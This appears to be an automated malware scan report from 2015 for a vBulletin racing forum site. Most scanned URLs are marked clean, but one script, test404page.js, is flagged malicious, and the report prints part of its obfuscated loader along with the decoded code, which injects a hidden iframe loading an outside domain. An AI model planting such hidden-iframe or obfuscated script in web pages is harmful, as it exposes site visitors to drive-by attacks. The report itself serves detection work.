Scanned pages/files
Request | Server response | Status |
http://washingtonraceways.com/ | HTTP/1.1 303 See Other Connection: close Date: Tue, 27 Jan 2015 12:52:26 GMT Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/ Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/ | clean |
http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 18131 Content-Type: text/html | clean |
http://www.washingtonraceways.com/clientscript/vbulletin-core.js?v=422 | 200 OK Content-Length: 51946 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_activitystream.js?v=422 | 200 OK Content-Length: 10072 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_md5.js?v=422 | 200 OK Content-Length: 5464 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/index.php?s=e024869112f3fde77a165596e24caf15 | HTTP/1.1 303 See Other Connection: close Date: Tue, 27 Jan 2015 12:52:31 GMT Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: bb_lastvisit=1422363151; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/ Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/ | clean |
http://www.washingtonraceways.com/test404page.js | 404 Not Found Content-Length: 44551 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var IOI='=sTKn4Ddwl2JrcicjN3L84jI40iZ0VXPwNmJ3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var _0x362a=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function I1O(_0x6ea4x2){var _0x6ea4x3=_0x362a[0];var _0x6ea4x4,_0x6ea4x5,_0x6ea4x6,_0x6ea4x7,_0x6ea4x8,_0x6ea4x9,_0x6ea4xa,_0x6ea4xb,_0x6ea4xc=0,_0x6ea4xd=_0x362a[1];do{_0x6ea4x7=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://keystat.net/');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); <iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://apiajax.info/?id=200667 | 500 Can't connect to apiajax.info:80 Content-Length: 187 Content-Type: text/plain | clean |
http://apiajax.info/test404page.js | 500 Can't connect to apiajax.info:80 Content-Length: 187 Content-Type: text/plain | clean |
http://mobilesniffer.ru/?id=200667 | 500 Can't connect to mobilesniffer.ru:80 Content-Length: 191 Content-Type: text/plain | clean |
http://washingtonraceways.com/register.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 24465 Content-Type: text/html | clean |
http://washingtonraceways.com/clientscript/vbulletin_ajax_nameverif.js?v=422 | 200 OK Content-Length: 2502 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/clientscript/vbulletin_ajax_suggest.js?v=422 | 200 OK Content-Length: 8155 Content-Type: application/x-javascript | clean |
http://washingtonraceways.com/faq.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 17185 Content-Type: text/html | clean |
http://washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15 | 200 OK Content-Length: 18127 Content-Type: text/html | clean |
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Post | 200 OK Content-Length: 15217 Content-Type: text/html | clean |
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Event | 200 OK Content-Length: 15267 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: washingtonraceways.com
Result:
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
...0 bytes of data.
GET / HTTP/1.1
Host: washingtonraceways.com
Result:
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: washingtonraceways.com
Referer: http://www.google.com/search?q=washingtonraceways.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: washingtonraceways.com
Referer: http://www.google.com/search?q=washingtonraceways.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=washingtonraceways.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://washingtonraceways.com/
Result: washingtonraceways.com is not infected or malware details are not published yet.
Result: washingtonraceways.com is not infected or malware details are not published yet.